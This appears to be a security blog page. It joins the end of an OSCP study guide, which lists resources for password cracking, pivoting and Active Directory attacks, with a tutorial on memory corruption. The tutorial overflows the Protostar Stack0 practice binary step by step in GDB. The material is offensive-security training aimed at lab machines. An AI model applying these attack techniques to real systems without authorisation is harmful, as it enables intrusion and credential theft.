
Wordlists:

In Kali: /usr/share/wordlists
Seclists: apt-get install seclists You can find all of his password lists here: https://github.com/danielmiessler/SecLists/tree/master/Passwords

Xajkep Wordlists: https://github.com/xajkep/wordlists

Online Password Crackers:

Confusingly these are also online crackers but these are collections of pre-broken hashes (e.g. wordlists that have been hashed) or computing services that you can use to break hashes. I usually went for these first to see if they had the hash cracked in their database. However, don’t use these online crackers as your main tools for everything. Uploading a hash from an engagement can be a huge risk so make sure you use your offline tools to crack those types of hashes. Here is a list of online hash crackers that I found online that you can use to crack hashes:

Other Resources for Password Cracking:

Pwning Wordpress Passwords: https://medium.com/bugbountywriteup/pwning-wordpress-passwords-2caf12216956

Section 17: Port Redirection and Pivoting

Depending on your scope, some of the machines may not be directly accessible. There are systems out there that are dual homed, which allow you to connect into an internal network. You will need to know some of these techniques in order to obtain access into there non-public networks:

Abatchy’s Port Forwarding Guide: https://www.abatchy.com/2017/01/port-forwarding-practical-hands-on-guide
Windows Port Forwarding: http://woshub.com/port-forwarding-in-windows/
SSH Tunnelling Explained: https://chamibuddhika.wordpress.com/2012/03/21/ssh-tunnelling-explained/
Understanding Proxy Tunnels: https://www.offensive-security.com/metasploit-unleashed/proxytunnels/
Understanding Port forwarding with Metasploit: https://www.offensive-security.com/metasploit-unleashed/portfwd/
Explore Hidden Networks with Double Pivoting: https://pentest.blog/explore-hidden-networks-with-double-pivoting/
0xdf hacks stuff. Pivoting and Tunnelling: https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html

Tools to help you with Port Forwarding and Pivoting:

Proxychains: https://github.com/haad/proxychains
Proxychains-ng: https://github.com/rofl0r/proxychains-ng
SSHuttle (Totally Recommend learning this): https://github.com/sshuttle/sshuttle
SSHuttle Documentation: https://sshuttle.readthedocs.io/en/stable/
Chisel https://github.com/jpillora/chisel
Ligolo: https://github.com/sysdream/ligolo

Online Tunnelling Services:

Ngrok: https://ngrok.com/
Twilo: https://www.twilio.com/

Vulnerable systems to practice pivoting:

Wintermute: https://www.vulnhub.com/entry/wintermute-1,239/

Section 18: Active Directory Attacks:

This was a new section that I was really looking forward to learning about when the new update was released! Active Directory is a popular service that we see running in the real world because it helps system administrators manage their systems, users, services, and much more depending on the size of their organisation.

Active Directory Domain Services can be installed on Windows Server (2000-2019). I highly encourage you to make some time to learn how to install Active Directory on a Windows Server (version of your liking). This will help you get an understanding how to setup your own Active Directory Environment as well.

Fundamentals of Active Directory: https://www.youtube.com/watch?v=GfqsFtmJQg0&feature=emb_logo

I have provided some resources to help you get started:

Setting up Active Directory:

Note: Make sure when you are setting up the Active Directory Server that you assign a static IP address to it and also a workstation that you will be joining the server to for further testing. I recommend that you set up a Windows 10 Workstation if you plan to use Windows Server 2016/2019.

Microsoft Documentation to install Active Directory: https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/deploy/install-active-directory-domain-services–level-100-
Install Windows Active Directory on Windows Server 2019: https://computingforgeeks.com/how-to-install-active-directory-domain-services-in-windows-server/
Understanding Users Accounts in Active Directory: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts
Three ways to create an Active Directory User: https://petri.com/3-ways-to-create-new-active-directory-users
Join a Workstation to the Domain: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/join-a-computer-to-a-domain

Tools to help you automate the installation for Active Directory:

ADLab: https://github.com/browninfosecguy/ADLab
Automated Lab: https://github.com/AutomatedLab/AutomatedLab
MSLab: https://github.com/microsoft/MSLab
Invoke-ADLabDeployer: https://github.com/outflanknl/Invoke-ADLabDeployer
Active Directory User Setup: https://github.com/bjiusc/Active-Directory-User-Setup-Script

Enumerating Active Directory:

Active Directory Enumeration with Powershell: https://www.exploit-db.com/docs/english/46990-active-directory-enumeration-with-powershell.pdf
Active Directory Exploitation Cheat Sheet: https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet#domain-enumeration
Powersploit: https://github.com/PowerShellMafia/PowerSploit

Understanding Authentication protocols that Active Directory Utilizes:

NTLM Authentication: https://docs.microsoft.com/en-us/windows-server/security/kerberos/kerberos-authentication-overview
Kerberos Authentication https://docs.microsoft.com/en-us/windows-server/security/kerberos/kerberos-authentication-overview
Cache and Stored Credentials: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v=ws.11)
Group Managed Service Accounts: https://adsecurity.org/?p=4367

Lateral Movement in Active Directory:

Paving the Way to DA: https://blog.zsec.uk/path2da-pt1
- Part 2, 3
Pass the Hash with Machine Accounts: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/pass-the-hash-with-machine-accounts
Overpass the hash (Payload All the things): https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#overpass-the-hash-pass-the-key
Red Team Adventures Overpass the Hash: https://riccardoancarani.github.io/2019-10-04-lateral-movement-megaprimer/#overpass-the-hash
Pass the Ticket (Silver Tickets): https://adsecurity.org/?p=2011
Lateral Movement with DCOM: https://www.ired.team/offensive-security/lateral-movement/t1175-distributed-component-object-model

Active Directory Persistence:

Cracking Kerberos TGS Tickets Using Kerberoast: https://adsecurity.org/?p=2293
Kerberoasting Without Mimikatz: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
Golden Tickets: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets
Pass the Ticket (Golden Tickets): https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#pass-the-ticket-golden-tickets
Understanding DCSync Attacks: https://attack.stealthbits.com/privilege-escalation-using-mimikatz-dcsync

Tools for Active Directory Lateral Movement and Persistence:

ADRecon: https://github.com/sense-of-security/ADRecon
Kerbrute: https://github.com/ropnop/kerbrute
Rubeus: https://github.com/GhostPack/Rubeus
Impacket: https://github.com/SecureAuthCorp/impacket

Other Resources:

Building an Active Directory with PowerShell: https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell/
Lateral Movement for AD: https://riccardoancarani.github.io/2019-10-04-lateral-movement-megaprimer/#overpass-the-hash
Lateral Movement with CrackMapExec: https://www.hackingarticles.in/lateral-moment-on-active-directory-crackmapexec/

Section 19: Metasploit Framework

The only guide that I used to learn more about Metasploit is Offensive Security Metasploit Unleashed course…which is free! https://www.offensive-security.com/metasploit-unleashed/

Other Resources: Metasploit The Penetration Tester’s Guide (A super awesome book to read): https://nostarch.com/metasploit

Metasploit Documentation: https://docs.rapid7.com/metasploit/getting-started/

Msfvenom Cheat Sheets:

Section 20: Powershell Empire:

PowerShell Empire is a post-exploitation framework that includes a pure-PowerShell Windows agent that is compatible with Python 3.x Linux/OS X agents. It is the merger of the previous PowerShell Empire and Python EmPyre projects. Recently the Kali Linux team is partnering with BC Security to sponsor PowerShell Empire. This sponsorship provides Kali users with 30-day exclusive early access to Empire and Starkiller before the updates are publicly released to the official repository.

Originally created by harmj0y, sixdub, and enigma0x3. On July 31, 2019 the project was no longer supported and the team at BC Security is now maintaining the most active fork of Empire https://github.com/BC-SECURITY/Empire.

The course does a great job explaining how to use the tool and how can you use it. Here are some resources that you can look into to get an understanding of how PowerShell Empire works:

Installing PowerShell Empire: https://github.com/BC-SECURITY/Empire/wiki/Installation
Using PowerShell Empire: https://alpinesecurity.com/blog/empire-a-powershell-post-exploitation-tool/

Other Resources:

Starkiller: https://github.com/BC-SECURITY/Starkiller
Empire Cli: https://github.com/BC-SECURITY/Empire-Cli
Malleable C2 Profiles for Empire: https://github.com/BC-SECURITY/Malleable-C2-Profiles

Extra Resources

This concludes the resources I have used that helped me understand the course syllabus. Now I will share with you some tips and extra resources that I used to prepare for the PEN200 PWK/OSCP.

Setting up your Pentesting Environment:

The course recommends that you are using VMware products to run the custom Kali Linux image that they have created. Windows users can purchase VMware Workstation or use their free program VMware Player. As for MAC Users you will need to use VMware Fusion. If you would like to download the custom Kali Linux System for the PWK you can find it here:

https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/

Keep in mind that the virtual machines hosted on Offensive Security are updated by the Kali Linux Team. The new PWK does not require you to use a custom Kali system they have made. You can use the latest version that the Kali Linux team maintains to complete the labs/course exercises.

Another virtual machine I created was a Windows 7 32-bit system to spin up any vulnerable applications I needed to debug or to check if I could obtain a shell from them. You could also create a Windows 7 64-bit system as well but some of 32-bit applications may not work properly as they would on an actual 32-bit system. This practice is great to implement in case you are stuck on a windows system that is running a service that for some reason you cannot obtain a shell on.

For Active Directory preparation I created a Windows Server 2019 and a Windows 10 Pro virtual machine to join to the AD environment I created. There are a few good guides on setting up AD environments in your own lab:

MyExploit2600 AD Lab Creation
Orchestrating Automated Lab Creation
- Parts 2, 3 4, 5

If you are interested in expanding your enviroment and wondering how you can do that I wrote a guide to help you get started on building your own homelab:

https://www.netsecfocus.com/home/lab/2020/09/21/Tjnulls_guide_to_building_a_Home_Lab.html

Wargames/Hands-on Challenges:

I know I stated theses before but I am going to reiterate this:

OverTheWire Bandit: A good set of fun Linux challenges to get yourself familiarizes with bash and Linux. Abatchys walkthrough really helped me here:

Bandit 1-5: https://www.abatchy.com/2016/10/overthewire-bandit-0-5
Bandit 6-10: https://www.abatchy.com/2016/10/overthewire-bandit-6-10
Bandit 11-15: https://www.abatchy.com/2016/10/overthewire-bandit-11-15
Bandit 16-20: https://www.abatchy.com/2016/10/overthewire-bandit-16-20
Bandit 21-26: https://www.abatchy.com/2016/10/overthewire-bandit-21-24

OverTheWire Natas: A good set of simple web application challenges. These challenges will help you understand the basics you need to identify issues in web applications. Check out this walkthrough here: https://infamoussyn.wordpress.com/2014/02/05/overthewire-natas-level-0-16-writeup-updated/

UndertheWire: Probably my favorite place for challenges because they contain a huge set of PowerShell challenges. You can find their challenges here: http://www.underthewire.tech/wargames.htm

Root-me.org A huge place that has challenges for almost everything in cybersecurity. For instance, you will see challenges in the following areas:

Network Forensics (Packet Analysis, Captured Traffic, Network Services)
Programming (C, PHP, Java, Shell-coding)
Reverse Engineering (disassemble applications)
Web Applications and Client Challenges.
Forensic Challenges.

Spend a few minutes going through some of these!

SANS Holiday Hack Challenges: https://www.holidayhackchallenge.com/past-challenges/

Capture the Flag Competitions (CTFs)/Cyber Competitions:

I know some of you are reading this are probably skeptical on why I added this…well to be honest the cybersecurity careers that we are in are not a normal 7am-3pm job…it is a lifestyle. I understand for many of us that it is hard to set some time to do all of the things in this field and that is totally OK! If you have the time or if you already can, set some time out of your busy schedule to do a CTF. Go ahead and hack all of the things that many of these CTFs provide as challenges. Trust me you will learn some cool things in a CTF that not even a class may be able to teach you. Personally, competing in CTFs did help me in this course and also it gave me a better understanding of what things I should be looking for instead of jumping into rabbit holes!

Also do not be scared to compete in a CTF if it is your first time! Everyone has to start somewhere in their journey you just have to keep pushing forward. So, go out there and find some CTFs whether they are local to you or online make some time and have confidence in doing them.

If you cannot find any local CTFs check out CTFTime for online competitions that you can participate in. A lot of the cyber competitions in the past few years really helped me build my skills and I still go out once in awhile to find a CTF to compete in for fun 😊. You may also find CTF’s that Offsec sponsors where you can be able to win a PWK voucher!

Vulnerable Machines:

Boot-to-Root Vulnerable Machines! These machines are excellent to help you build your skills for pentesting. There are places where you can download them and run them on your system to begin practice or places where you can connect to their range and start hacking into the targets they have. Most of them result in obtaining root or Administrative/System level access in the end. Personally, my three favorite places are Proving Grounds, Hackthebox and Vulnhub.

Keep in mind that the boxes that you assess on these platforms should be used as a way to get started, to build your practical skills, or brush up on any weak points that you may have in your pentesting methodology.

When you are comfortable to take the course, It is encouraged that you try to go through every system that is in the PWK/OSCP lab environment, as they will provide better insight for when you attempt to the exam itself.

Proving Grounds:

Offensive Security has released their own private lab environment where you can practice your pentest skills with the boxes they provide online. The platform offers two tiers PG Play and PG Practice. PG Play brings the boxes from Vulnhub to life and provides dedicated access by connecting to their environment through a VPN or you can use the in base Kali Linux browser system. Keep in mind that PG Play only allows you three hours per day to assess a system in the Play environment. They only provide Linux boxes as well but this could change in the future.

PG Practice includes all of the features and removes the three hour time limit but Practice also offers Linux and Windows boxes that you can use to improve your pentesting skills as these boxes are created by Offsec Experts. Some of the systems you may notice were old Offsec Exam machines that you can assess to sharpen your hacking skills.

With the approval from Offsec I have created a list of boxes that I have gone through that I believe were OSCP Like. You can find the list here and check for updates that I will add to the list in the future:

HackTheBox:

An online penetration testing platform that contains a variety of machines to help you improve your penetration testing skills. For those who have not gone through the registration you will need to pass a challenge to generate yourself an activation code. Once you have generated your activation code, then you will have the ability to access their range. In the free tier you are allowed to play with the 20 active machines they have and they cycle a new system in the range every week and retire an old one there as well. If you want to access to their retired machines you will have to get VIP access. It is a very affordable in my opinion, and worth it to invest in. If you do not have the funds to invest into Hackthebox, do not worry because you can certainly find these walkthroughs online (once the boxes are retired). One place I would definitely recommend to look at is IppSec Hackthebox Walkthroughs on YouTube! I love watching his videos because he goes through step by step on how to obtain access onto the target and how to escalate your privileges to obtain root access. Each box has a different scenario and IppSec always has something extra to throw in when he is doing his walkthroughs.

With that being said I created a list of all of boxes that I did in Hackthebox that I thought were OSCP Like. You can find them here and also check out IppSec playlist he created from the list I recommended to start watching!

I will continue to be updating this list in the future, and if you would like to keep it around you can find it here and on NetSecFocus: https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=1839402159

HTB Boxes to Prepare for OSCP (Youtube Playlist): https://www.youtube.com/playlist?list=PLidcsTyj9JXK-fnabFLVEvHinQ14Jy5tf

Ippsec Rocks: https://ippsec.rocks/?#

Vulnhub:

Just like Hackthebox, except you have to download the vulnerable machines and run them on your local system. You will need VMware or VirtualBox (I recommend VMware workstation) to run these vulnerable systems. Please make sure that you are running these vulnerable systems on an isolated network and not on a public network.
Thanks to g0tmi1k and his team for hosting this site and to the creators who submit these vulnerable machines. I have also created a list of vulnhub machines that I have found to be OSCP-Like as well. You can find them here and on NetSecFocus:

I will continue to update this list and if you would like a copy for review you can certainly find it here: https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=0

Rooting Vulnerable Machines is extremely important when you are preparing for PWK/OSCP because you can’t depend on theoretical knowledge to pass. Improving your hands-on skills will play a huge key role when you are tackling these machines.

Tips to participate in the Proctored OSCP exam:

As of August 15th, 2018, all OSCP exams have a proctored exam. This means that a student will be monitored by an Offensive Security staff member through a screen sharing and webcam service. If you would like to learn more about this new proctoring process you can find it here: https://www.offensive-security.com/offsec/proctoring/ Before I took my exam, I had to go through a variety of things to make sure I was prepared to take my 1st attempt. Even with my preparation, I lost 30 mins of my actual exam time due to troubleshooting the applications for the proctor on my end. With that being said, here are my tips to help you guys prepare for the proctoring section when you are ready to take the exam:

Make sure your system is able to meet the software/hardware requirements that offensive security provides in order to run these services. You can find that information here: https://support.offensive-security.com/proctoring-faq/
Test your webcam to make sure it works. you cannot use a spare laptop that has a webcam and connect the webcam session onto that system.
The Screen Sharing application needs to be running on your main system that you will be using to connect to your exam.
You can use multiple monitors for the exam. Keep in mind that the proctor must be able to see them and that they are connected to your system. The proctor will notify you about how many screens they see and you will need to confirm them with the number monitors you are using. If you use a system that has a monitor and it is not connected to the ScreenConnect application, then you will not be able to use that monitor for the exam.
Be prepared and log into your webcam and ScreenConnect sessions 30 mins before your exam.
Proctors cannot provide any assistance during the exam.
You can take breaks, a nap, or grab a cup of coffee during your exam. Just make sure you notify the proctor when you leave and when you return for your exam.
Students are not allowed to record their screens while interacting with any of the exam machines.
Also be dressed for your exam. I think that is pretty simple to understand why.

For any other questions you may have you can check out Offensive Security FAQ for Proctored Exams here: https://www.offensive-security.com/faq/

Other Resources:

NetSecFocus Learning Resources:

https://docs.google.com/spreadsheets/d/12bT8APhWsL-P8mBtWCYu4MLftwG1cPmIL25AEBtXDno/edit#gid=937533738

Offsec Introduction Guide to the OSCP: https://help.offensive-security.com/hc/en-us/articles/360059535932

PWK Learning Path: A very useful resource to help get started on what boxes you should go through in the PWK lab. Some of the boxes they provide also contain hints for the boxes as well:

https://help.offensive-security.com/hc/en-us/articles/360050473812

Books:

Kali Linux Revealed: https://www.kali.org/download-kali-linux-revealed-book/
Attacking Network Protocols: https://nostarch.com/networkprotocols
Red Team Field Manual: https://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504
Hash-Crack-Password-Cracking-Manual v3: https://www.amazon.com/Hash-Crack-Password-Cracking-Manual/dp/1793458618
Operator Handbook: Red Team + OSINT + Blue Team Reference: https://www.amazon.com/dp/B085RR67H5
The Hacker Playbook Series: https://securepla.net/hacker-playbook/
The Web Application Hacker Handbook: http://mdsec.net/wahh/
Learn Windows PowerShell in a Month of Lunches 3rd Edition https://www.amazon.com/Learn-Windows-PowerShell-Month-Lunches/dp/1617294160
Violent Python: https://www.amazon.com/Violent-Python-Cookbook-Penetration-Engineers/dp/1597499579
Black Hat Python: https://nostarch.com/blackhatpython

Courses that can help you prepare for OSCP:

eLearnSecurity/INE:

eLearnSecurity use to be a great place to learn more about pentesting with the courses they offered. Now that they are owned by INE you now have to buy training from there subscription based platform to learn from the material they offer to be able to obtain the certifications Elearnsecurity offers.

INE Cybersecurity Training: https://ine.com/pages/cybersecurity

eLearnSecurity Certs:

TryHackMe:

A platform to help people grow there skills and learn more about cybersecurity. They have a variety of different rooms you can choose from and they do a good job explaining fundamental concepts in some of these rooms. They also having learning paths that you can complete as well but you may have to pay for them or purchase a subscription to access them.

https://tryhackme.com/

SANS:

SANS provides a wide variety of information security courses. Each of their courses are taught by very smart instructors who have been in this field for a very long time. However, these courses can be expensive if you are unable to get someone to pay for them. You can also try to apply for the SANS workforce training as well to be able to take their courses at a discount. I have taken most of the SANS course and I feel that the following courses below really helped me get a better understanding of what Pentesting is like in the actual field. Here are the courses that I would recommend if you are looking to prepare for OSCP.

Pentesterlabs: A lot of web app pentesting material in this course: https://pentesterlab.com/

Pentester Academy: https://www.pentesteracademy.com/topics

Web Security Academy: https://portswigger.net/web-security

Other OSCP guides:

Conclusion:

Well then! It seems you have made it to the end of this journey (well not your OSCP journey if you decide to pursue it!). If you read this entire guide, I certainly give you props for doing so. If you read only parts of it, then I still give you props because the main thing that is important to me is that you learned something from it!

I hope you are able to use my guide in your OSCP journey and are able to learn some new things, just like I did when I started mine. If this guide was able to help you let me know I want your feedback for sure. I thanked a lot of people for helping me with my journey in this guide and I want to thank them again for their time and contributions for helping me learn and grow in the cyber-security field.

If anyone has any questions about this guide or feedback please let me know as you can reach out to me on twitter, discord, or on NetSecFocus!

TJ Null

Twitter: https://twitter.com/TJ_Null
Github: https://github.com/tjnull
Netsec Focus: Tjnull
Discord: Tjnull#1788

P.S: Considering this journey as an extra mile, I am going to have to insist at this point for you to…… Try Harder! -Offensive Security

Reverse Engineering and Exploit Development Made Easy - Chapter 3

Sat, 15 Feb 2020 00:00:00 +0000

Reverse Engineering and Exploit Development Made Easy - Chapter 3: Linux BOFs

:~# ./im_back

Hello again fellow geeks! I’m back, bringing you another exciting chapter! I know I know, you’ve missed me. But I’m here to stay now!

In this chapter, we will dive into the basics of Linux exploitation. You will see that in many ways, Linux exploitation is quite similar to Windows.

Most concepts learned in the past will be applied here, so I suggest that you go through the previous chapters before going through this one.

With that being said, let us dive right in!

:~# ./intro

To understand the basics of Linux exploitation, we will be looking at the first form: Stack buffer overflows.

We will start by learning memory corruption, which will give us a good understanding of how memory is treated in Linux, and from there we will gradually make our way into developing a complete exploit.

:~# configure

Protostar’s exploit exercises VM ( https://exploit-exercises.lains.space/protostar/ ) is a great resource that will help us on our journey, along with OverTheWire’s Narnia wargame.

So grab an iso from Protostar, and set it up in your desired virtual machine manager. I will be using VirtualBox as always. We will use ssh to log into this VM ( use hostname –I to get the local IP of the VM).

The default credentials for Protostar are user:user.

:~# setup

For Linux, the choice of debuggers isn’t as varied as Windows. Throughout our journey, we will be mainly using GDB (GNU Debugger), the default debugger that comes with Linux. You can alternatively use EDB.

As we progress, we will see how we can pimp GDB up to do all sorts of cool tricks, and develop exploits with ease (spoiler alert: gdb-peda 😉).

:~# ./code_analysis

To see the source code of the challenge, we have to navigate to the exploit exercises website, where the source code for all challenges is given. We will be starting with the Stack0 challenge, that focuses on memory corruption. Take a look at the code below:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}

The includes are just importing usual C libraries. Stdlib.h is a general-purpose standard library that helps with memory allocation, process control, etc.

Unistd.h is a header file that provides access to the POSIX OS API. Similar to the standard library.

Stdio.h is the standard input/output header file that manages I/O operations.

The main function initializes two variables: buffer, that takes 64 characters, and modified, which is a volatile integer. This means that the variable modified can take multiple values. The main function also takes one user-supplied argument.

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

modified is initially set to 0, and the line below that is responsible for reading the characters in buffer from our input, and printing it on to the screen. The function that does this is gets().

 modified = 0;
 gets(buffer);

Now here is where our vulnerability lies, in the gets() function. The problem with gets() is, if we enter a string that is longer than 64 bytes, gets() does not do any check on the size whatsoever, so it will keep reading our input from the stack until it finds a new line. Which means, our string will OVERFLOW outside the given buffer of 64 bytes, and start to overwrite other variables, until our string ends.

In this case, we need to change the value of the modified variable, that is located somewhere on the stack. The if else conditions tell us that we succeed once we change the value of the modified variable from 0 to anything (I.e. not equal to (!=) 0).

if(modified != 0) {
    printf("you have changed the 'modified' variable\n");
} else {
    printf("Try again?\n");
}

Alrighty then! Now that we have analysed the code completely, let us start debugging the binary in order to understand where our variables lie on the stack, and how our input affects it. I will be using GDB to debug the binary.

So first, fire up the Protostar VM, and use the command hostname -I to display the local IP address of the VM. I suggest that you use a Bridged Adapter while setting up the VM, and set the adapter to the current interface that’s being used. That way, the VM will be on your network and you can easily ssh into it. Binaries are located in /opt/protostar/bin/.

:~# ./debugging

To open the binary in GDB, we will use the command $ gdb stack0, followed by the command (gdb) disas main, which will disassemble the main function for us. What you see is a representation of the binary in assembly.

0x080483f4 <main+0>:	push   %ebp
0x080483f5 <main+1>:	mov    %esp,%ebp
0x080483f7 <main+3>:	and    $0xfffffff0,%esp
0x080483fa <main+6>:	sub    $0x60,%esp
0x080483fd <main+9>:	movl   $0x0,0x5c(%esp)
0x08048405 <main+17>:	lea    0x1c(%esp),%eax
0x08048409 <main+21>:	mov    %eax,(%esp)
0x0804840c <main+24>:	call   0x804830c <gets@plt>
0x08048411 <main+29>:	mov    0x5c(%esp),%eax
0x08048415 <main+33>:	test   %eax,%eax
0x08048417 <main+35>:	je     0x8048427 <main+51>
0x08048419 <main+37>:	movl   $0x8048500,(%esp)
0x08048420 <main+44>:	call   0x804832c <puts@plt>
0x08048425 <main+49>:	jmp    0x8048433 <main+63>
0x08048427 <main+51>:	movl   $0x8048529,(%esp)
0x0804842e <main+58>:	call   0x804832c <puts@plt>
0x08048433 <main+63>:	leave  
0x08048434 <main+64>:	ret

So right off the bat, even if you don’t understand assembly too well, you can see the call instruction, calling the function gets() at the address 0x0804840c. This will come in handy during testing.

So a few things before we continue:

ESP is our stack pointer. This points to the start/top of the stack.
PUSH is an instruction which pushes a value stored in a particular register to the top of the stack.
JMP is an instruction which will jump to a particular address to continue execution flow. JE is “jump if equal to”, which means that after the comparison (the test instruction), if the condition is satisfied, it will jump to said location. This represents the “if-else” iteration in our code.

Our objective here is to change the value of the modified variable from 0 to anything else. Modified is somewhere on the stack, and in order to overwrite it with our desired value, we will have to overflow a section of the stack that lies before this variable in order to reach it.

There is one line in the disassembly that is particularly interesting though. It moves the value of 0 (hex 0x0) to the location esp + 0x5c. This tells us the location of the modified variable on the stack. Now, we will use the previous call instruction, and this one to set our breakpoints. A breakpoint is a pause in the execution flow of the binary, which will help us in understanding how values on the stack change after a particular instruction is executed.

We will do this by executing:

(gdb) break *0x0804840c
Breakpoint 1 at 0x804840c: file stack0/stack0.c, line 11.
(gdb) break *0x08048411
Breakpoint 2 at 0x8048411: file stack0/stack0.c, line 13.
(gdb)

This will stop the execution flow before the call to gets() is made, and after that, before the value of modified is transferred to the accumulator (eax) for comparison. Now, let’s run the binary by executing r.

(gdb) r
Starting program: /opt/protostar/bin/stack0

Breakpoint 1, 0x0804840c in main (argc=1, argv=0xbffffd54) at stack0/stack0.c:11

So we hit our first breakpoint, right before the call to gets(). If we run i r, it will give us further information on the registers at this point of time.

(gdb) i r
eax            0xbffffc5c	-1073742756
ecx            0x644d8780	1682802560
edx            0x1	1
ebx            0xb7fd7ff4	-1208123404
esp            0xbffffc40	0xbffffc40
ebp            0xbffffca8	0xbffffca8
esi            0x0	0
edi            0x0	0
eip            0x804840c	0x804840c <main+24>
eflags         0x200282	[ SF IF ID ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51

We can see that the address of the call instruction is in the EIP register. EIP holds the address to the next instruction which is to be executed. Now, let’s take a look at what the stack looks like right now by executing x/30wx $esp.This will print 32 hexadecimal words off the stack. 30 has just been taken for simplicity purposes.

(gdb) x/32wx $esp
0xbffffc40:	0xbffffc5c	0x00000001	0xb7fff8f8	0xb7f0186e
0xbffffc50:	0xb7fd7ff4	0xb7ec6165	0xbffffc68	0xb7eada75
0xbffffc60:	0xb7fd7ff4	0x08049620	0xbffffc78	0x080482e8
0xbffffc70:	0xb7ff1040	0x08049620	0xbffffca8	0x08048469
0xbffffc80:	0xb7fd8304	0xb7fd7ff4	0x08048450	0xbffffca8
0xbffffc90:	0xb7ec6365	0xb7ff1040	0x0804845b	0x00000000
0xbffffca0:	0x08048450	0x00000000	0xbffffd28	0xb7eadc76
0xbffffcb0:	0x00000001	0xbffffd54	0xbffffd5c	0xb7fe1848

We can use this to find the location of the modified variable. To find the address, we execute x/wx $esp+0x5c, as we know from earlier that the variable is stored at the location $esp+0x5c or 0x5c(%esp). x/wx stands for ‘examine’, so this will give us the address and the contents of modified.

(gdb) x/wx $esp+0x5c
0xbffffc9c:	0x00000000

From this, we can see that the address of modified on the stack is 0xbffffc9c, and it contains 0. So if we correspond this with our stack print from earlier, this is where modified is:

                          These are contents
           |---------------------|----------------------|
           |                                            |
0xbffffc90: 0xb7ec6365	0xb7ff1040 0x0804845b 0x00000000 <---- modified

Addresses:  0xbffffc90  0xbffffc94 0xbffffc98 0xbffffc9c

Each address here is 4 bytes long, so the contents of c90 is given after the colon. If we add 4 bytes after c90 three times until we reach 0x0000000, we get the address as c9c. This is how the math works out in GDB.

Now, let’s continue execution flow by executing c. Then, let’s just enter a few A’s just as a test. That way, we will know the location of our buffer on the stack.

(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 2, main (argc=1, argv=0xbffffd54) at stack0/stack0.c:13
13	in stack0/stack0.c

We hit our second breakpoint, which is right before the binary moves the value of modified to EAX for the comparison (The if-else iteration). Now, let’s take a look at the stack:

(gdb) x/32wx $esp
0xbffffc40:	0xbffffc5c	0x00000001	0xb7fff8f8	0xb7f0186e
0xbffffc50:	0xb7fd7ff4	0xb7ec6165	0xbffffc68	0x41414141
0xbffffc60:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc70:	0x41414141	0x41414141	0xbffffc00	0x08048469
0xbffffc80:	0xb7fd8304	0xb7fd7ff4	0x08048450	0xbffffca8
0xbffffc90:	0xb7ec6365	0xb7ff1040	0x0804845b	0x00000000 <-----
0xbffffca0:	0x08048450	0x00000000	0xbffffd28	0xb7eadc76
0xbffffcb0:	0x00000001	0xbffffd54	0xbffffd5c	0xb7fe1848

So the hexadecimal value of A is 0x41. We can see our A’s starting at 0xbffffc60. This suggests that our buffer starts at this address. We can also see that we still have not reached the modified variable, which is why we haven’t been able to overwrite the value. Remember the size of our buffer? 64. If we enter about 80 A’s, we may be able overflow the modified variable and change it’s value. Let’s give this a shot:

(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/stack0

Breakpoint 1, 0x0804840c in main (argc=1, argv=0xbffffd54) at stack0/stack0.c:11
11	in stack0/stack0.c
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 2, main (argc=1, argv=0xbffffd54) at stack0/stack0.c:13
13	in stack0/stack0.c

(gdb) x/32wx $esp
0xbffffc40:	0xbffffc5c	0x00000001	0xb7fff8f8	0xb7f0186e
0xbffffc50:	0xb7fd7ff4	0xb7ec6165	0xbffffc68	0x41414141
0xbffffc60:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc70:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc80:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc90:	0x41414141	0x41414141	0x41414141	0x41414141 <----
0xbffffca0:	0x41414141	0x41414141	0x41414141	0xb7eadc00
0xbffffcb0:	0x00000001	0xbffffd54	0xbffffd5c	0xb7fe1848

Et voila! We have overwritten the value of the modified variable, and also overwritten variables after that with out A’s. Let’s do this outside of GDB now:

$ echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ./stack0
you have changed the 'modified' variable
Segmentation fault

We have completed our first memory corruption exercise! This lays the foundation for stack buffer overflows, so if you’ve made it this far give yourself a good pat on the back! That’s all for now! I’ll see you in the next post!

Reverse Engineering and Exploit Development Made Easy - Chapter 2

Mon, 08 Jul 2019 00:00:00 +0000

Reverse Engineering and Exploit Development Made Easy - Chapter 2

